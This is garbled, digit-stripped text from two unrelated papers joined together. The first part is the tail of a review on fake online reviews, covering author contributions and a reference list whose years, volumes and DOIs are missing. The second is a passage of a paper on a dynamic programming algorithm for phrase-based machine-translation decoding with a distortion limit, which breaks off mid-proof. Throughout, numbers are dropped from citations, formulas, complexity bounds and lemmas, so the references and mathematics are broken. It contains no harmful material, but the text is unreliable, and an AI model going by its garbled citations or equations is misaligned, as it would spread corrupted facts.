there are no competing interests. author contributions • ana reyes-menendez conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. • jose ramon saura conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper. • ferrão filipe performed the experiments, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this is a review article and does not have raw data. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amstar. . amstar is a reliable and valid measurement tool to assess the method- ological quality of systematic reviews. . available at www.ncbi.nlm.nih.gov/ pubmed/ (accessed on september ). banerjee a, duflo e, glennerster r, kinnan c. . the miracle of microfinance? evidence from a randomized evaluation. american economic journal: applied economics ( ): – doi . /app. . banerjee s, chua ay. . understanding the process of writing fake online reviews. in: ninth international conference on digital information management (icdim ). piscataway: ieee doi . /icdim. . . banerjee s, chua ay, kim j. . using supervised learning to classify authentic and fake online reviews. new york: acm doi . / . . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information www.ncbi.nlm.nih.gov/pubmed/ www.ncbi.nlm.nih.gov/pubmed/ http://dx.doi.org/ . /app. http://dx.doi.org/ . /icdim. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. bassett d. . who wants to live forever? living, dying and grieving in our digital society. social sciences ( ): – doi . /socsci . bennett d, yábar dpb, saura jr. . university incubators may be socially valuable, but how effective are they? a case study on business incubators at universities. in: perisortiz m, gómez j, merigó-lindahl j, rueda-armengot c, eds. entrepreneurial universities. innovation, technology, and knowledge management. cham, switzerland: springer doi . / - - - - _ . buhalis d, law r. . progress in information technology and tourism management: years on and years after the internet—the state of etourism research. tourism management ( ): – doi . /j.tourman. . . . cardoso ef, silva rm, almeida ta. . towards automatic filtering of fake reviews. neurocomputing : – doi . /j.neucom. . . . chang t, hsu py, cheng ms, chung cy, chung yl. . detecting fake review with rumor model—case study in hotel review. in: intelligence science and big data engineering. big data and machine learning techniques lecture notes in computer science. – doi . / - - - - _ . chen ry, guo jy, deng xl. . detecting fake reviews of hype about restaurants by sentiment analysis. in: web-age information management lecture notes in computer science. vol . cham: springer, – doi . / - - - - _ . cheng lc, tseng jc, chung ty. . case study of fake web reviews. in: proceedings of the ieee/acm international conference on advances in social networks analysis and mining . new york: acm, – . cheung cm, thadani dr. . the impact of electronic word-of-mouth commu- nication: a literature analysis and integrative model. decision support systems ( ): – doi . /j.dss. . . . chevalier j, mayzlin d. . the effect of word of mouth on sales: online book reviews. journal of marketing research ( ): – doi . /w . chew s, metheney e, teague t. . modelling and simulation of the formation of social networks. social sciences ( ): – doi . /socsci . comerio n, strozzi f. . tourism and its economic impact: a literature review using bibliometric tools. tourism economics ( ): – doi . / . deng x, chen r. . sentiment analysis based online restaurants fake reviews hype detection. in: web technologies and applications lecture notes in computer science. cham: springer, – doi . / - - - - _ . elmurngi e, gherbi a. . an empirical study on detecting fake reviews using machine learning techniques. in: seventh international conference on innovative computing technology (intech). doi . /intech. . . elmurngi ei, gherbi a. . unfair reviews detection on amazon reviews using sentiment analysis with supervised learning techniques. journal of computer science ( ): – doi . /jcssp. . . . google trends. . available at www.google.com/trends (accessed on december ). reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /socsci http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /w http://dx.doi.org/ . /socsci http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /intech. . http://dx.doi.org/ . /jcssp. . . www.google.com/trends http://dx.doi.org/ . /peerj-cs. gottschalk sa, mafael a. . cutting through the online review jungle—investigating selective ewom processing. journal of interactive marketing : – doi . /j.intmar. . . . gretzel u, fesenmaier dr, formica s, o’leary jt. . searching for the future: challenges faced by destination marketing organizations. journal of travel research ( ): – doi . / . gretzel u, yoo kh. . use and impact of online travel reviews. in: informa- tion and communication technologies in tourism. vienna: springer, – doi . / - - - - _ . hennig-thurau t, walsh g, walsh g. . electronic word-of-mouth: motives for and consequences of reading customer articulations on the internet. international journal of electronic commerce ( ): – doi . / . . . hubert m, blut m, brock c, backhaus c, eberhardt t. . acceptance of smartphone-based mobile shopping: mobile benefits, customer characteristics, perceived risks, and the impact of application context. psychology & marketing ( ): – doi . /mar. . huete-alcocer n. . a literature review of word of mouth and electronic word of mouth: implications for consumer behavior. frontiers in psychology : – doi . /fpsyg. . . hunt km. . gaming the system: fake online reviews v. consumer law. computer law and security review ( ): – doi . /j.clsr. . . . kazakov s, predvoditeleva m. . how travelers use online and social media channels to make hotel choice decisions. a comparative study of russian federation and american tourists’ online consumer behavior. higher school of economics research paper no. wp brp /man/ doi . /ssrn. . kim s, kandampully j, bilgihan a. . the influence of ewom communications: an application of online social network framework. computers in human behavior : – doi . /j.chb. . . . kollwitz h, papathanassis a. . evaluating cruise demand forecasting practices: a delphi approach. in: gibson p, papathanassis a, milde p, eds. cruise sector challenges. wiesbaden: gabler verlag, – doi . / - - - - _ . kullenberg c, kasperowski d. . what is citizen science?—a scientometric meta- analysis. plos one ( ):e doi . /journal.pone. . ladhari r, michaud m. . ewom effects on hotel booking intentions, attitudes, trust, and website perceptions. international journal of hospitality management : – doi . /j.ijhm. . . . lappas t, sabnis g, valkanas g. a. the impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. information systems research ( ): – doi . /isre. . . lappas t, sabnis g, valkanas g. b. the impact of fake reviews on online visibility: a vulnerability assessment of the hotel industry. information systems research ( ): – doi . /isre. . . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.intmar. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / . . http://dx.doi.org/ . /mar. http://dx.doi.org/ . /fpsyg. . http://dx.doi.org/ . /j.clsr. . . http://dx.doi.org/ . /ssrn. http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ijhm. . . http://dx.doi.org/ . /isre. . http://dx.doi.org/ . /isre. . http://dx.doi.org/ . /peerj-cs. li h, chen z, liu b, wei x, shao j. . spotting fake reviews via collective positive- unlabeled learning. in: ieee international conference on data mining. piscataway: ieee doi . /icdm. . . li n, du s, zheng h, xue m, zhu h. . fake reviews tell no tales? dissecting click farming in content-generated social networks. china communications ( ): – doi . /cc. . . li y, feng x, zhang s. . detecting fake reviews utilizing semantic and emotion model. in: rd international conference on information science and control engineering (icisce). piscataway: ieee doi . /icisce. . . lin y, zhu t, wu h, zhang j, wang x, zhou a. . towards online anti-opinion spam: spotting fake reviews from the review sequence. in: ieee/acm interna- tional conference on advances in social networks analysis and mining (asonam ). piscataway: ieee doi . /asonam. . . litvin sw, goldsmith re, pan b. . electronic word-of-mouth in hospitality and tourism management. tourism management ( ): – doi . /j.tourman. . . . luca m, zervas g. . fake it till you make it: reputation, competition, and yelp review fraud. management science ( ): – doi . /mnsc. . . luo y, chen y, zheng w. . a literature review on evaluating tourism destinations. in: isme —information science and management engineering iv—volume : isme. doi . / . luo q, zhong d. . using social network analysis to explain communication characteristics of travel-related electronic word-of-mouth on social networking sites. tourism management : – doi . /j.tourman. . . . manes e, tchetchik a. . the role of electronic word of mouth in reducing infor- mation asymmetry: an empirical investigation of online hotel booking. journal of business research : – doi . /j.jbusres. . . . mauri ag, minazzi r. . web reviews influence on expectations and purchasing intentions of hotel potential customers. international journal of hospitality manage- ment : – doi . /j.ijhm. . . . moher d, liberati a, tetzlaff j, altman dg. . preferred reporting items for systematic reviews and meta-analyses: the prisma statement. journal of clinical epidemiology ( ): – doi . /j.jclinepi. . . . moutinho l, ballantyne r, rate s. . consumer behaviour in tourism. strategic management in tourism : – doi . / . . munar am, jacobsen jk. . motivations for sharing tourism experiences through social media. tourism management : – doi . /j.tourman. . . . munzel a. . assisting consumers in detecting fake reviews: the role of identity information disclosure and consensus. journal of retailing and consumer services : – doi . /j.jretconser. . . . Önder i, gunter u. . forecasting tourism demand with google trends for a major european city destination. tourism analysis ( ): – . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /icdm. . http://dx.doi.org/ . /cc. . http://dx.doi.org/ . /icisce. . http://dx.doi.org/ . /asonam. . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.jbusres. . . http://dx.doi.org/ . /j.ijhm. . . http://dx.doi.org/ . /j.jclinepi. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.jretconser. . . http://dx.doi.org/ . /peerj-cs. pai m, chu h, wang s, chen y. . electronic word of mouth analysis for service experience. expert systems with applications ( ): – doi . /j.eswa. . . . papathanassis a. . revisiting the tourism long-tail scenario. the long tail of tourism : – doi . / - - - - _ . papathanassis a, buhalis d. . exploring the information and communication technologies revolution and visioning the future of tourism, travel and hospi- tality industries, th e-tourism futures forum: ict revolutionising tourism – , guildford. international journal of tourism research ( ): – doi . /jtr. . papathanassis a, knolle f. . exploring the adoption and processing of online holiday reviews: a grounded theory approach. tourism management ( ): – doi . /j.tourman. . . . price dj. . little science, big science. new york: columbia university press doi . /pric . ramalingam d, chinnaiah v. . fake profile detection techniques in large-scale online social networks: a systematic review. computers and electrical engineering : – doi . /j.compeleceng. . . . reyes-menendez a, saura j, alvarez-alonso c. a. understanding #worldenvironmentday user opinions in twitter: a topic-based sentiment analysis approach. international journal of environmental research and public health ( ): – doi . /ijerph . reyes-menendez a, saura jr, martinez-navalon jg. . the impact of e-wom on hotels management reputation: exploring tripadvisor review credibility with the elm model. ieee access ( ) doi . /access. . . reyes-menendez a, saura jr, palos-sánchez p. b. crowdfunding y financiación . . un estudio exploratorio sobre el turismo cultural. international journal of information systems and tourism ( ): – . reyes-menendez a, saura jr, palos-sanchez p, alvarez jm. . understanding user behavioral intention to adopt a search engine that promotes sustainable water management. symmetry ( ): – doi . /sym . riegner c. . word of mouth on the web: the impact of web . on consumer purchase decisions. journal of advertising research ( ): – doi . /s . saura jr, bennett d. . a three-stage methodological process of data text mining: a ugc business intelligence analysis. symmetry-basel doi . /rg. . . . . saura jr, palos-sanchez p, reyes-menendez a. . marketing a través de aplicaciones móviles de turismo (m-tourism). un estudio exploratorio. international journal of world of tourism ( ): – doi . /ijwt. saura jr, palos-sánchez p, suárez lm. . understanding the digital market- ing environment with kpis and web analytics. future internet ( ): – doi . /fi . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /jtr. http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /pric http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /ijerph http://dx.doi.org/ . /access. . http://dx.doi.org/ . /sym http://dx.doi.org/ . /s http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /ijwt http://dx.doi.org/ . /fi http://dx.doi.org/ . /peerj-cs. saura jr, reyes-menendez a, alvarez-alonso c. a. do online comments affect en- vironmental management? identifying factors related to environmental management and sustainability of hotels. sustainability : – doi . /su . saura jr, reyes-menendez a, palos-sanchez p. b. un analisis de sentimiento en twitter con machine learning: identificando el sentimiento sobre las ofertas de# blackfriday. revista espacios : – . saura jr, rodriguez herráez b, reyes-menendez a. . comparing a traditional approach for financial brand communication analysis with a big data analytics technique. ieee access ( ): – doi . /access. . . shea bj, hamel c, wells ga, bouter lm, kristjansson e, grimshaw j, boers m. . amstar is a reliable and valid measurement tool to assess the methodological quality of systematic reviews. journal of clinical epidemiology ( ): – doi . /j.jclinepi. . . . sherman k, cherkin dc, erro j, miglioretti dl, deyo ra. . comparing yoga, exercise, and a self-care book for chronic low back pain: a randomized, controlled trial. yearbook of medicine : – doi . /s - ( ) - . shu k. . available at https://techcrunch.com/ / / /ftc-brings-its-first-case- against-fake-paid-reviews-on-amazon (accessed on march ). van den bosch m, ode sang a. . urban natural environments as nature based solutions for improved public health—a systematic review of reviews. journal of transport & health :s doi . /j.jth. . . . vermeulen ie, seegers d. . tried and tested: the impact of online hotel re- views on consumer consideration. tourism management ( ): – doi . /j.tourman. . . . walle ah. . quantitative versus qualitative tourism research. annals of tourism research ( ): – doi . /s - ( ) - . xie h, miao l, kuo p, lee b. . consumers’ responses to ambivalent online hotel reviews: the role of perceived source credibility and pre-decisional dis- position. international journal of hospitality management ( ): – doi . /j.ijhm. . . . zhang d, zhou l, kehoe jl, kilic iy. . what online reviewer behaviors re- ally matter? effects of verbal and nonverbal behaviors on detection of fake online reviews. journal of management information systems ( ): – doi . / . . . reyes-menendez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /su http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.jclinepi. . . http://dx.doi.org/ . /s - ( ) - https://techcrunch.com/ / / /ftc-brings-its-first-case-against-fake-paid-reviews-on-amazon https://techcrunch.com/ / / /ftc-brings-its-first-case-against-fake-paid-reviews-on-amazon http://dx.doi.org/ . /j.jth. . . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.ijhm. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. a polynomial-time dynamic programming algorithm for phrase-based decoding with a fixed distortion limit yin-wen chang google research, new york yinwen@google.com michael collins∗ google research, new york mjcollins@google.com abstract decoding of phrase-based translation mod- els in the general case is known to be np- complete, by a reduction from the traveling salesman problem (knight, ). in practice, phrase-based systems often impose a hard distortion limit that limits the movement of phrases during translation. however, the im- pact on complexity after imposing such a con- straint is not well studied. in this paper, we describe a dynamic programming algorithm for phrase-based decoding with a fixed dis- tortion limit. the runtime of the algorithm is o(nd!lhd+ ) where n is the sentence length, d is the distortion limit, l is a bound on the number of phrases starting at any position in the sentence, and h is related to the maximum number of target language translations for any source word. the algorithm makes use of a novel representation that gives a new perspec- tive on decoding of phrase-based models. introduction phrase-based translation models (koehn et al., ; och and ney, ) are widely used in statisti- cal machine translation. the decoding problem for phrase-based translation models is known to be dif- ficult: the results from knight ( ) imply that in the general case decoding of phrase-based transla- tion models is np-complete. the complexity of phrase-based decoding comes from reordering of phrases. in practice, however, various constraints on reordering are often imposed in phrase-based translation systems. a common constraint is a “distortion limit”, which places a hard constraint on how far phrases can move. the com- plexity of decoding with such a distortion limit is an open question: the np-hardness result from knight ∗on leave from columbia university. ( ) applies to a phrase-based model with no dis- tortion limit. this paper describes an algorithm for phrase- based decoding with a fixed distortion limit whose runtime is linear in the length of the sentence, and for a fixed distortion limit is polynomial in other fac- tors. more specifically, for a hard distortion limit d, and sentence length n, the runtime is o(nd!lhd+ ), where l is a bound on the number of phrases start- ing at any point in the sentence, and h is related to the maximum number of translations for any word in the source language sentence. the algorithm builds on the insight that de- coding with a hard distortion limit is related to the bandwidth-limited traveling salesman problem (btsp) (lawler et al., ). the algorithm is eas- ily amenable to beam search. it is quite different from previous methods for decoding of phrase-based models, potentially opening up a very different way of thinking about decoding algorithms for phrase- based models, or more generally for models in sta- tistical nlp that involve reordering. related work knight ( ) proves that decoding of word-to-word translation models is np-complete, assuming that there is no hard limit on distortion, through a reduc- tion from the traveling salesman problem. phrase- based models are more general than word-to-word models, hence this result implies that phrase-based decoding with unlimited distortion is np-complete. phrase-based systems can make use of both re- ordering constraints, which give a hard “distortion limit” on how far phrases can move, and reorder- ing models, which give scores for reordering steps, often penalizing phrases that move long distances. moses (koehn et al., b) makes use of a distor- tion limit, and a decoding algorithm that makes use transactions of the association for computational linguistics, vol. , pp. – , . action editor: holger schwenk. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. of bit-strings representing which words have been translated. we show in section . of this paper that this can lead to at least n/ bit-strings for an input sentence of length n, hence an exhaustive version of this algorithm has worst-case runtime that is expo- nential in the sentence length. the current paper is concerned with decoding phrase-based models with a hard distortion limit. various other reordering constraints have been considered. zens and ney ( ) and zens et al. ( ) consider two types of hard constraints: the ibm constraints, and the itg (inversion transduc- tion grammar) constraints from the model of wu ( ). they give polynomial time dynamic pro- gramming algorithms for both of these cases. it is important to note that the ibm and itg constraints are different from the distortion limit constraint con- sidered in the current paper. decoding algorithms with itg constraints are further studied by feng et al. ( ) and cherry et al. ( ). kumar and byrne ( ) describe a class of re- ordering constraints and models that can be encoded in finite state transducers. lopez ( ) shows that several translation models can be represented as weighted deduction problems and analyzes their complexities. koehn et al. ( ) describe a beam- search algorithm for phrase-based decoding that is in widespread use; see section for discussion. a number of reordering models have been pro- posed, see for example tillmann ( ), koehn et al. ( a) and galley and manning ( ). denero and klein ( ) consider the phrase alignment problem, that is, the problem of find- ing an optimal phrase-based alignment for a source- language/target-language sentence pair. they show that in the general case, the phrase alignment prob- lem is np-hard. it may be possible to extend the techniques in the current paper to the phrase- alignment problem with a hard distortion limit. various methods for exact decoding of phrase- based translation models have been proposed. za- slavskiy et al. ( ) describe the use of travel- an earlier version of this paper states the complexity of de- coding with a distortion limit as o(i d) where d is the distor- tion limit and i is the number of words in the sentence; however (personal communication from adam lopez) this runtime is an error, and should be o( i) i.e., exponential time in the length of the sentence. a corrected version of the paper corrects this. ing salesman algorithms for phrase-based decod- ing. chang and collins ( ) describe an exact method based on lagrangian relaxation. aziz et al. ( ) describe a coarse-to-fine approach. these al- gorithms all have exponential time runtime (in the length of the sentence) in the worst case. galley and manning ( ) describe a decoding algorithm for phrase-based systems where phrases can have discontinuities in both the source and tar- get languages. the algorithm has some similarities to the algorithm we propose: in particular, it makes use of a state representation that contains a list of disconnected phrases. however, the algorithms dif- fer in several important ways: galley and manning ( ) make use of bit string coverage vectors, giv- ing an exponential number of possible states; in con- trast to our approach, the translations are not formed in strictly left-to-right ordering on the source side. background: the traveling salesman problem on bandwidth-limited graphs this section first defines the bandwidth-limited trav- eling salesman problem, then describes a polyno- mial time dynamic programming algorithm for the traveling salesman path problem on bandwidth lim- ited graphs. this algorithm is the algorithm pro- posed by lawler et al. ( ) with small modifica- tions to make the goal a path instead of a cycle, and to consider directed rather than undirected graphs. . bandwidth-limited tspps the input to the problem is a directed graph g = (v,e), where v is a set of vertices and e is a set of directed edges. we assume that v = { , , . . . ,n}. a directed edge is a pair (i,j) where i,j ∈ v , and i = j. each edge (i,j) ∈ e has an associated weight wi,j. given an integer k ≥ , a graph is bandwidth-limited with bandwidth k if ∀(i,j) ∈ e, |i− j| ≤ k the traveling salesman path problem (tspp) on the graph g is defined as follows. we will assume that vertex is the “source” vertex and vertex n is the “sink” vertex. the tspp is to find the minimum cost directed path from vertex to vertex n, which passes through each vertex exactly once. the algorithm is based on the ideas of monien and sudbor- ough ( ) and ratliff and rosenthal ( ). . an algorithm for bandwidth-limited tspps the key idea of the dynamic-programming algo- rithm for tspps is the definition of equivalence classes corresponding to dynamic programming states, and an argument that the number of equiv- alence classes depends only on the bandwidth k. the input to our algorithm will be a directed graph g = (v,e), with weights wi,j, and with bandwidth k. we define a -n path to be any path from the source vertex to the sink vertex n that visits each vertex in the graph exactly once. a -n path is a subgraph (v ′,e′) of g, where v ′ = v and e′ ⊆ e. we will make use of the following definition: definition . for any -n path h, define hj to be the subgraph that h induces on vertices , , . . .j, where ≤ j ≤ n. that is, hj contains the vertices , , . . .j and the edges in h between these vertices. for a given value for j, we divide the vertices v into three sets aj, bj and cj: • aj = { , , . . . , (j −k)} (aj is the empty set if j ≤ k). • bj = { . . .j}\aj. • cj = {j + ,j + , . . . ,n} (cj is the empty set if j = n). note that the vertices in subgraph hj are the union of the sets aj and bj. aj is the empty set if j ≤ k, but bj is always non-empty. the following lemma then applies: lemma . for any -n path h in a graph with bandwidth k, for any ≤ j ≤ n, the subgraph hj has the following properties: . if vertex is in aj, then vertex has degree one. . for any vertex v ∈ aj with v ≥ , vertex v has degree two. . hj contains no cycles. proof. the first and second properties are true be- cause of the bandwidth limit. under the constraint of bandwidth k, any edge (u,v) in h such that for sets x and y we use the notation x \ y to refer to the set difference: i.e., x \ y = {x|x ∈ x and x /∈ y }. u ∈ aj, must have v ∈ aj ∪ bj = hj. this fol- lows because if v ∈ cj = {j + ,j + , . . .n} and u ∈ aj = { , , . . .j − k}, then |u − v| > k. similarly any edge (u,v) ∈ h such that v ∈ aj must have u ∈ aj ∪ bj = hj. it follows that for any vertex u ∈ aj, with u > , there are edges (u,v) ∈ hj and (v′,u) ∈ hj, hence vertex u has degree . for vertex u ∈ aj with u = , there is an edge (u,v) ∈ hj, hence vertex u has degree . the third property (no cycles) is true because hj is a subgraph of h, which has no cycles. it follows that each connected component of hj is a directed path, that the start points of these paths are in the set { }∪ bj, and that the end points of these paths are in the set bj. we now define an equivalence relation on sub- graphs. two subgraphs hj and h′j are in the same equivalence class if the following conditions hold (taken from lawler et al. ( )): . for any vertex v ∈ bj, the degree of v in hj and h′j is the same. . for each path (connected component) in hj there is a path in h′j with the same start and end points, and conversely. the significance of this definition is as follows. assume that h∗ is an optimal -n path in the graph, and that it induces the subgraph hj on vertices . . .j. assume that h′j is another subgraph over vertices . . .j, which is in the same equivalence class as hj. for any subgraph hj, define c(hj) to be the sum of edge weights in hj: c(hj) = ∑ (u,v)∈hj wu,v then it must be the case that c(h′j) ≥ c(hj). oth- erwise, we could simply replace hj by h′j in h ∗, thereby deriving a new -n path with a lower cost, implying that h∗ is not optimal. this observation underlies the dynamic program- ming approach. define σ to be a function that maps a subgraph hj to its equivalence class σ(hj). the equivalence class σ(hj) is a data structure that stores the degrees of the vertices in bj, together with the start and end points of each connected compo- nent in hj. next, define ∆ to be a set of , or edges be- tween vertex (j + ) and the vertices in bj. for any subgraph hj+ of a -n path, there is some ∆, sim- ply found by recording the edges incident to vertex (j + ). for any hj, define τ(σ(hj), ∆) to be the equivalence class resulting from adding the edges in ∆ to the data structure σ(hj). if adding the edges in ∆ to σ(hj) results in an ill-formed subgraph—for example, a subgraph that has one or more cycles— then τ(σ(hj), ∆) is undefined. the following re- currence then defines the dynamic program (see eq. of lawler et al. ( )): α(j + ,s) = min ∆,s′:τ(s′,∆)=s ( α(j,s′) + c(∆) ) here s is an equivalence class over vertices { . . . (j+ )}, and α(s,j+ ) is the minimum score for any subgraph in equivalence class s. the min is taken over all equivalence classes s′ over vertices { . . .j}, together with all possible values for ∆. a dynamic programming algorithm for phrase-based decoding we now describe the dynamic programming algo- rithm for phrase-based decoding with a fixed distor- tion limit. we first give basic definitions for phrase- based decoding, and then describe the algorithm. . basic definitions consider decoding an input sentence consisting of words x . . .xn for some integer n. we assume that x = <s> and xn = </s> where <s> and </s> are the sentence start and end symbols respectively. a phrase-based lexicon specifies a set of possible translations in the form of phrases p = (s,t,e), where s and t are integers such that ≤ s ≤ t ≤ n, and e is a sequence of m ≥ target-language words e . . .em. this signifies that words xs . . .xt in the source language have a translation as e . . .em in the target language. we use s(p), t(p) and e(p) to refer to the three components of a phrase p = (s,t,e), and e (p) . . .em(p) to refer to the words in the target- language string e(p). we assume that ( , ,<s>) and (n,n,</s>) are the only translation entries with s(p) ≤ and t(p) ≥ n respectively. a derivation is then defined as follows: definition (derivations). a derivation is a se- quence of phrases p . . .pl such that • p = ( , ,<s>) and pl = (n,n,</s>). • each source word is translated exactly once. • the distortion limit is satisfied for each pair of phrases pi− ,pi, that is: |t(pi− ) + −s(pi)| ≤ d ∀ i = . . .l. where d is an integer specifying the distortion limit in the model. given a derivation p . . .pl, a target-language translation can be obtained by concatenating the target-language strings e(p ) . . .e(pl). the scoring function is defined as follows: f(p . . .pl) = λ(e(p ) . . .e(pl)) + l∑ i= κ(pi) + l∑ i= η ×|t(pi− ) + −s(pi)| ( ) for each phrase p, κ(p) is the translation score for the phrase. the parameter η is the distortion penalty, which is typically a negative constant. λ(e) is a lan- guage model score for the string e. we will assume a bigram language model: λ(e . . .em) = m∑ i= λ(ei|ei− ). the generalization of our algorithm to higher-order n-gram language models is straightforward. the goal of phrase-based decoding is to find y∗ = arg maxy∈y f(y) where y is the set of valid deriva- tions for the input sentence. remark (gap constraint): note that a common restriction used in phrase-based decoding (koehn et al., ; chang and collins, ), is to im- pose an additional “gap constraint” while decod- ing. see chang and collins ( ) for a descrip- tion. in this case it is impossible to have a dynamic- programming state where word xi has not been translated, and where word xi+k has been translated, for k > d. this limits distortions further, and it can be shown in this case that the number of possible bitstrings is o( d) where d is the distortion limit. without this constraint the algorithm of koehn et al. ( ) actually fails to produce translations for many input sentences (chang and collins, ). h = 〈π 〉 = 〈〈( , ,<s> )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉〉 h = 〈π ,π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉 , 〈( , , these criticisms )〉〉 h = 〈π ,π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )〉 , 〈( , , these criticisms )( , , seriously )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )( , , take )( , , these criticisms )( , , seriously )〉〉 h = 〈π 〉 = 〈〈( , ,<s> )( , , we must )( , , also )( , , take )( , , these criticisms )( , , seriously )( , , </s> )〉〉 figure : sub-derivations hj for j ∈ { , , , , , , } induced by the full derivation h =〈〈 ( , ,<s>)( , , we must)( , , also)( , , take)( , , these criticisms)( , , seriously)( , </s>) 〉〉 . note that hj includes the phrases that cover spans ending before or at position j. sub-derivation hj is extended to another sub- derivation hj+i by incorporating a phrase of length i. . the algorithm we now describe the dynamic programming algo- rithm. intuitively the algorithm builds a deriva- tion by processing the source-language sentence in strictly left-to-right order. this is in contrast with the algorithm of koehn et al. ( b), where the target- language sentence is constructed from left to right. throughout this section we will use π, or πi for some integer i, to refer to a sequence of phrases: π = 〈 p . . .pl 〉 where each phrase pi = (s(pi), t(pi),e(pi)), as de- fined in the previous section. we overload the s, t and e operators, so that if π = 〈 p . . .pl 〉 , we have s(π) = s(p ), t(π) = t(pl), and e(π) = e(p )·e(p ) . . .·e(pl), where x·y is the concatenation of strings x and y. a derivation h consists of a single phrase se- quence π = 〈 p . . .pl 〉 : h = π = 〈 p . . .pl 〉 where the sequence p . . .pl satisfies the con- straints in definition . we now give a definition of sub-derivations and complement sub-derivations: definition (sub-derivations and complement sub- -derivations). for any h = 〈 p . . .pl 〉 , for any j ∈ { . . .n} such that ∃i ∈ { . . .l} s.t. t(pi) = j, the sub-derivation hj and the complement sub- derivation h̄j are defined as hj =〈π . . .πr〉, h̄j = 〈π̄ . . . π̄r〉 where the following properties hold: • r is an integer with r ≥ . • each πi for i = . . .r is a sequence of one or more phrases, where each phrase p ∈ πi has t(p) ≤ j. • each π̄i for i = . . . (r− ) is a sequence of one or more phrases, where each phrase p ∈ π̄i has s(p) > j. • π̄r is a sequence of zero or more phrases, where each phrase p ∈ π̄r has s(p) > j. we have zero phrases in π̄r iff j = n where n is the length of the sentence. • finally, π · π̄ · π · π̄ . . .πr · π̄r = p . . .pl where x · y denotes the concatenation of phrase sequences x and y. note that for any j ∈ { . . .n} such that @i ∈ { . . .l} such that t(pi) = j, the sub-derivation hj and the complement sub-derivation h̄j is not de- fined. thus for each integer j such that there is a phrase in h ending at point j, we can divide the phrases in h into two sets: phrases p with t(p) ≤ j, and phrases p with s(p) > j. the sub-derivation hj lists all maximal sub-sequences of phrases with t(p) ≤ j. the complement sub-derivation h̄j lists all maximal sub-sequences of phrases with s(p) > j. figure gives all sub-derivations hj for the derivation h = 〈〈 p . . .p 〉〉 = 〈〈 ( , ,<s>)( , , we must)( , , also) ( , , take)( , , these criticisms) ( , , seriously)( , ,</s>) 〉〉 as one example, the sub-derivation h = 〈π ,π 〉 induced by h has two phrase sequences: π = 〈 ( , ,<s>)( , , we must)( , , also) 〉 π = 〈 ( , , these criticisms)( , , seriously) 〉 note that the phrase sequences π and π give trans- lations for all words x . . .x in the sentence. there are two disjoint phrase sequences because in the full derivation h, the phrase p = ( , , take), with t(p) = > , is used to form a longer sequence of phrases π pπ . for the above example, the complement sub- derivation h̄ is as follows: π̄ = 〈 ( , ,take) 〉 π̄ = 〈 ( , ,</s>) 〉 it can be verified that π ·π̄ ·π ·π̄ = h as required by the definition of sub-derivations and complement sub-derivations. we now state the following lemma: lemma . for any derivation h = p . . .pl, for any j such that ∃i such that t(pi) = j, the sub- derivation hj = 〈π . . .πr〉 satisfies the following properties: . s(π ) = and e (π ) = <s>. . for all positions i ∈ { . . .j}, there exists a phrase p ∈ π, for some phrase sequence π ∈ hj, such that s(p) ≤ i ≤ t(p). . for all i = . . .r, s(πi) ∈{(j −d + ) . . .j} . for all i = . . .r, t(πi) ∈{(j −d) . . .j} here d is again the distortion limit. this lemma is a close analogy of lemma . the proof is as follows: proof of property : for all values of j, the phrase p = ( , ,<s>) has t(p ) ≤ j, hence we must have π = p . . .pk for some k ∈ { . . .l}. it follows that s(π ) = and e (π ) = <s>. proof of property : for any position i ∈ { . . .j}, define the phrase (s,t,e) in the derivation h to be the phrase that covers word i; i.e., the phrase such that s ≤ i ≤ t. we must have s ∈ { . . .j}, because s ≤ i and i ≤ j. we must also have t ∈{ . . .j}, because otherwise we have s ≤ j < t, which contradicts the assumption that there is some i ∈{ . . .l} such that t(pi) = j. it follows that the 